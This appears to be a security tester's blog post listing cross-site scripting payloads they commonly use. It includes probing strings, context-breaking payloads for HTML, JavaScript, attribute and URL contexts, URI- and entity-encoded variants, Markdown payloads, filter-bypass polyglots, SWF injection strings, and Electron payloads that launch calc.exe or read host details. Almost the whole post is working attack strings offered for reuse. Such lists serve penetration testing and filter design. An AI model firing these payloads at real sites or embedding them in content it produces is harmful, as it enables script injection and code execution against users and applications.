Common XSS payloads I use

Common XSS Tricks I use

This post contains a common list of XSS payloads I tend to use most of often. Taken from the internet, the origin of most of these payloads are uknown but they are often shared on twitter.

Detection/Probing

I usually use the following payloads from probing/detection:

<iframe/onload=prompt(1)>
<img src=1 onerror=confirm(1)>
<snoopy contenteditable id=x onfocus=prompt()>

Context Breaking

HTML Context

<a href="javaScriPt:alert(1)">CLICKHERE</a>
<svg/onload=&#97&#108&#101&#114&#116(1)>
<details/open/ontoggle="alert(1)"/>

JavaScript Context

);alert(1);//
'-confirm(1)-' 
'-confirm`1`-'
');confirm(1);
');confirm(1);// 
'-confirm(1)-'

Attribute Context

value="" onmouseover="alert('XSS')">
value=#000000r93kponfocus=alert(1)autofocus=r93kp
color-input=%23000000 onmouseover=alert(1)  
?q=<body style=overflow:auto;height:1000px onscroll=alert(1337) id=x>#x 
onmouseover=confirm(1) 
num=' onerror=alert(1) alt='
"" onmouseover=alert(1) ">
 "onload="javascript:alert(1)
 " onload="alert(1)
 "onmouseover="confirm(1)//

URL Context

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWmVwaHJGaXNoJyk8L3NjcmlwdD4=
data://text/javascript/alert(1)
/onafterscriptexecute=confirm(1)1='
#onafterscriptexecute=confirm(1)1=' 
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

Encodings

URI Encoding

<a href="javascript:alert%281%29">xss</a>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"/>

HTML Entities

<img src=x onerror=&#x22;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x22;>
<a href="javascript:alert&#x28;1&#x29">xss</a>

Markdown XSS Payloads I commonly use

[ClickMe](javascript:prompt(window.location.pathname))
[ClickME](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
![ClickME](https://www.example.com/image.png"onload="alert(1))

Other common things I try:

* Case Sensitive: `<Iframe Src="//snoopysecurity" OnlOad="alert(0)"/>`
* Arbritary Tags `<snoopy onmouseover="alert(1)">Test</snoopy>`
* Insert with no closing tags: `<img src="x" onerror="alert(1)"` (Browsers will happily execute this)
* Add forward slashes or whitespace e.g. svg onload or svg/onload

Polyglot (Taken from https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> 

Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

SWF Parameter XSS

For automation, you can use Flashbang, Flare or HP SWFScan.

* Common Parameters: onload, allowedDomain, movieplayer, xmlPath, eventhandler, callback (more on OWASP page)
* Common Injection Strings: `` +\%22})))}catch(e){alert(document.domain);}//, ”]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//,“a”)(({type:”ready”}));}catch(e){alert(1)}//``

Electron

<iframe src=x onload="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')"></iframe>
"><img src=1 onerror="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">
<onmouseover="alert(1)"> <s onmouseover="var os = require('os'); var hostname = os.platform(); var homedir = os.homedir(); alert('Host:' + hostname + 'directory: ' + homedir);">Hallo</s>

Following resources are great reference guides:

* https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
* https://github.com/masatokinugawa/filterbypass
* https://github.com/cure53/H5SC
* https://owasp.org/www-community/xss-filter-evasion-cheatsheet#XSS_Locator
* https://htmledit.squarefree.com/